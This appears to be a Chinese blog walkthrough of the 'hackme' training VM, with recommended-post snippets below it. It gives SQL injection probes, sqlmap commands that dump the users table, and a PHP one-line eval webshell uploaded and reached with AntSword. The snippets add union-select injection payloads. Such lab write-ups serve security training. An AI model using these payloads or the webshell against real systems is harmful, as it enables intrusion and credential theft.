hackme靶场攻略

于 2025-03-13 20:08:58 发布
阅读量541 收藏 4
点赞数 17
CC 4.0 BY-SA版权
文章标签: sql 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_85578339/article/details/146239828

1.打开kali虚拟机和hackme靶机,都用nat模式连接

2.用kali扫描hackme靶机的ip

3.外部浏览器访问靶机IP

4.运用kali dirb命令扫描敏感文件

5.注册用户,登录

6.进入首页,发现是一个查询页面,可能存在sql注入

7.判断是否存在sql注入

windows

windows' and 1=2#

8.bp抓搜索的包

将抓到的包保存成一个文件,在windows后面加一个*,说明这里是注入点

9.kali中使用sqlmap工具

爆破库名

sqlmap -r '1.txt' --current-db


爆破表名

sqlmap -r '1.txt' -D webapphacking --tables


打印‘users’表

sqlmap -r '1.txt' -D webapphacking -T users --dump

                         

发现有一个超级管理员用户,密码md5解密

10.登录超级管理员用户,发现文件上传

11.上传一句话木马

<?php @eval($_POST['cmd']);?>

12.访问uploads目录下,发现上传的木马

13.蚁剑连接

ksk852
关注
hackme靶场练习
SYJ_361的博客
03-18 2607
本文对hackme靶场进行练习,运用sql注入漏洞,以及msf木马反弹shell,进而取得root权限
oscp备考,oscp系列——hackme靶场sql注入,文件上传,信息收集提权
最新发布
2202_75361164的博客
01-31 453
oscp备考,oscp系列——hackme靶场sql注入,文件上传,信息收集提权难度简单偏下对于低权限shell获取涉及:sql注入,文件上传对于提权:信息收集。
hackme靶场(getshell)
weixin_65722679的博客
06-21 338
hackme靶场(getshell)
靶场-hackeme1
weixin_58602402的博客
06-12 278
1.在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件。Linux OS' order by 1# //正常。Linux OS' order by 4# //不正常。3.编写反弹shell的脚本,shell.py,并利用蚁剑上传并执行。Linux OS' order by 3# //正常。Linux OS' and 1=2 # //不正常。Linux OS' and 1=1 # //正常。7.爆破数据库名,用户名,版本号。
hackme靶场/靶机练习
weixin_69602647的博客
07-29 299
hackme靶场练习
hackme靶场教程
weixin_53198216的博客
07-29 243
1.扫描目录得到靶场地址,进行联合查询得到回显点,查询数据表名。11.打开蚁剑进入地址,看是否可以进行操作。9.抓包过程中,把jpg改为php后放行。5.根据列名得到用户名和密码。6.使用md5解密得到密码。8.上传一个图片马并进行抓包。10.查看木马上传是否成功。3.根据库名得到表名。4.根据表名得到列名。
Hackme靶机渗透
m0_50584370的博客
06-01 376
hackme靶机渗透
Hackme1
追求卓越,技术流~
01-12 2303
文章目录前言一、搭建靶场环境二、实战2.1信息收集2.1.1网络扫描2.1.2查看靶机开放的端口22段口分析80端口分析2.2SQL注入2.2.1验证是否含有SQL注入漏洞2.2.2sqlmap注入攻击2.3文件上传漏洞2.4kali监听2.5权力提升总结 前言 学习网络安全技术,我认为:主要是在注重实战。 实践是检验真理的唯一标准 接下来主要围绕靶机的攻击进程来学习网络安全技术。 一、搭建靶场环境 攻击机kali: IP地址:192.168.247.129 靶机hackme1: IP地址:192.
hackme靶机渗透~SQL注入+文件上传
weixin_67832625的博客
08-13 499
本文今天对hackerme这个靶机做了详细的介绍,主要是SQL注入和文件上传漏洞,难度适中,需要我们自习的对漏洞挖掘 ,最后提权的过程,有任何问题随时反馈作者
hackme靶场通关
weixin_56594114的博客
08-02 137
模式子网地址,靶机需要也设置成。显示结果,说明闭合方式是'去扫描全网段查看靶机的。
HACKME-1 打靶
weixin_57315671的博客
06-16 359
8.查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#9.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
HACKME:1靶机
JKding123的博客
10-22 1162
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
hackme2-dhcp靶场记录
lionwerson的博客
10-10 1348
1.下载靶场 下载地址 2.打开虚拟机,导入虚拟机后把网络模式由NAT改为桥接模式,启动。 先用浏览器访问一下80端口,是一个登录,没有验证码,可以试一下爆破。我这里还是先注册一下,不行再爆破。 可以注册,注册登录之后发现这是一个图书系统。 搜索一下试试,显示了所有的图书。 但凡有搜索的地方,先试一下sql注入,抓包看一下,post有search参数,手工测试一下。 search存注入,字符型。联合注入一下,试一下字段数。 没有注入成功,盲...
hackme漏洞打靶
C233333235的博客
07-29 474
order by 3时页面显示正常,4时页面显示错误,所以这里存在sql注入漏洞,因为他是post提交,url中没有参数,于是我们抓包到sqlmap中运行,这里要在参数(这里是1)后面加一个*,提醒sqlmap这是参数,我们将请求包复制粘贴到sqlmap根目录下的一个叫html.txt的文件中。然后我们就要去找这个靶机的IP地址,首先将该虚拟机网卡设置为net模式,然后在物理机中查看自己ip,看看vmnet8的地址c段是什么,我这里是209,然后用工具去扫描该c段下哪个ip开放了80端口。
hackme靶场与Tomato靶场渗透测试实战
m0_59768231的博客
12-20 577
1、主机发现2.登录主页发现登录页面,而且还可以注册用户3. 点击 Sign up now 注册用户admin 密码1234564. 登录admin用户 单击search可以进行查看到很多的书名5. 验证sql注入 Windows OS' and 1=1#得到如图:验证出此处存在字符型(单引号)sql注入7. 判断字段数 Windows OS' order by 3#判断出来字段数是3个9.判断显示位置10. 查看当前数据库位置。
适合新手入门的靶场 TryHackMe(非常详细),零基础入门到精通,看这一篇就够了
weixin_51725318的博客
10-21 9689
适合新手入门的靶场 TryHackMe(非常详细),零基础入门到精通,看这一篇就够了
hackme 靶场复现
m0_68471358的博客
08-02 406
靶机下载地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/将靶机下载并导入到VMware虚拟机当中,开启hackme1靶场,并开启kali当作攻击机将两台虚拟机均设为桥接模式二.靶机渗透。
渗透Vulnhub-hackme靶机
C-HOWE的博客
01-13 891
本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列hackme靶机有一定的了解。
pikachu靶场攻略
06-13
Pikachu靶场是一款基于《宝可梦》(Pokemon)系列的游戏挑战,玩家通常在游戏内扮演皮卡丘进行各种训练和战斗。攻略这类游戏通常包括以下几个方面: 1. **熟悉规则**:了解游戏的基本操作,比如如何移动、攻击、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值